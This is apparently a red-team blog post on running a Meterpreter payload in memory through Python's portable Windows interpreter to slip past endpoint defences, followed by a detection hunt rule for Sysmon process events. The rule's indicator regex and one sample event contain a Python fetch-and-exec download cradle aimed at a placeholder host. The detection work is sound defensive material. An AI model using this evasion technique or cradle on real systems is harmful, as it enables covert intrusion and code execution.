Forget compiling payloads and operating on disk. This post demonstrates using Python’s portable (embeddable) interpreter for in-memory payload deployment, even when Python isn’t installed on the host.
Python is a well-known language with countless legitimate uses inside an organization. Through Python’s portable package (officially the Windows embeddable package) we can download a single .zip file and gain access to the python.exe interpreter without any installation on the host, and without administrative rights.
Additionally, python.exe is a signed binary with a high reputation score, making it unlikely to be blocked by reputation-based controls. This provides a convenient vehicle for executing a C2 beacon, or any other payload, while on offensive security engagements.
The following video demonstrates PowerShell downloading and extracting the embeddable Python interpreter. Once the interpreter is on disk, a Python download cradle retrieves the payload and executes a Meterpreter shell in memory; only the interpreter touches disk, the payload itself never does. At the time of recording this bypassed the latest version of Windows Defender and other endpoint security solutions:
The payload source, PowerShell commands, and Python download cradle are available at github.com/m8sec/OffsecDev.
For more information on this technique, and potential areas of detection, check out Diego Capriotti’s Pyramid project or his DEF CON Adversary Village talk, Python vs Modern Defenses!
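On the detection side, the tradecraft above leaves a recognisable shape in process-creation telemetry: python.exe running from a user-writable directory rather than a managed install path, spawned by PowerShell (or another scripting host), with a fetch-then-exec one-liner on the command line. The following hunt rule is an added example, not code from this post or the OffsecDev repository. It scores constructed events shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the field names, the sample events, the indicator list and the alert threshold are assumptions made for this example and should be tuned to your environment.

```python
"""Hunt rule for the embeddable-Python tradecraft described above.

Added example, not code from the original post or the author's repository.
It scores constructed process-creation events shaped like Sysmon Event ID 1
(Image, ParentImage, CommandLine); the field names, the sample events and the
threshold are assumptions made for this example.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Where an IT-managed Python normally lives. An unpacked embeddable zip lands
# somewhere user-writable instead (Downloads, Temp, AppData, ...).
TRUSTED_INSTALL_DIRS = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\",
)

# Living-off-the-land parents that typically stage the zip and launch it.
SHELL_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Cradle-like fragments: inline code (-c), code on stdin (-), and the usual
# fetch-then-exec primitives. Assumed indicators; extend for your environment.
CRADLE_PATTERN = re.compile(
    r"(\s-c\s|\s-\s*$|urlopen|urllib|requests\.get|\bexec\(|b64decode|marshal\.loads)",
    re.IGNORECASE,
)


@dataclass
class Event:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


@dataclass
class Finding:
    image: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def score_event(ev: Event) -> Finding:
    """One point per matched heuristic; processes that are not python.exe score 0."""
    finding = Finding(image=ev.image)
    image = ev.image.lower()
    if not image.endswith("\\python.exe"):
        return finding

    if not image.startswith(TRUSTED_INSTALL_DIRS):
        finding.score += 1
        finding.reasons.append("python.exe running outside a managed install path")

    parent_name = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if parent_name in SHELL_PARENTS:
        finding.score += 1
        finding.reasons.append(f"spawned by {parent_name}")

    if CRADLE_PATTERN.search(ev.command_line):
        finding.score += 1
        finding.reasons.append("download-cradle indicators in command line")
    return finding


def triage(events: List[Event], threshold: int = 2) -> List[Finding]:
    """Return findings that hit at least `threshold` heuristics (2 by default)."""
    return [f for f in map(score_event, events) if f.score >= threshold]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1: a managed install launching a developer's script from Explorer.
    Event(
        image="C:\\Program Files\\Python311\\python.exe",
        parent_image="C:\\Windows\\explorer.exe",
        command_line='"C:\\Program Files\\Python311\\python.exe" C:\\Users\\alice\\dev\\app.py',
    ),
    # 2: the pattern from the post: embeddable zip unpacked to Temp, launched by
    #    PowerShell with an in-memory fetch-and-exec one-liner.
    Event(
        image="C:\\Users\\alice\\AppData\\Local\\Temp\\python-embed-amd64\\python.exe",
        parent_image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        command_line=(
            '"C:\\Users\\alice\\AppData\\Local\\Temp\\python-embed-amd64\\python.exe" -c '
            '"import urllib.request as u;exec(u.urlopen(\'https://example.invalid/stage\').read())"'
        ),
    ),
    # 3: a developer running the embeddable build from Downloads: one weak signal only.
    Event(
        image="C:\\Users\\bob\\Downloads\\python-embed-amd64\\python.exe",
        parent_image="C:\\Windows\\explorer.exe",
        command_line='"C:\\Users\\bob\\Downloads\\python-embed-amd64\\python.exe" build.py',
    ),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[score {f.score}] {f.image}")
        for reason in f.reasons:
            print(f"    - {reason}")
```

The third sample event is the reason for the threshold: a lone embeddable interpreter in Downloads is a weak signal that a developer will trip regularly, so the rule only surfaces events where the unusual path is corroborated by a scripting-host parent or cradle-like arguments. Two caveats for anyone deploying something like this: matching on the image name is trivially evaded by renaming python.exe (or using pythonw.exe), so corroborate with Sysmon's OriginalFileName, Hashes and signer fields, and pivot to network-connection events (Sysmon Event ID 3) from the same process; and, as the post itself points out, the binary's valid signature is exactly why "signed by a trusted publisher" must not be an allowlisting criterion on its own.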
Thanks for reading and watching. Find out more about me at m8sec.dev and follow for more modern evasion tactics!
Disclaimer: All content is provided for educational purposes only. The author is not responsible for misuse of this information. Never test against systems you don’t own or have explicit permission to test.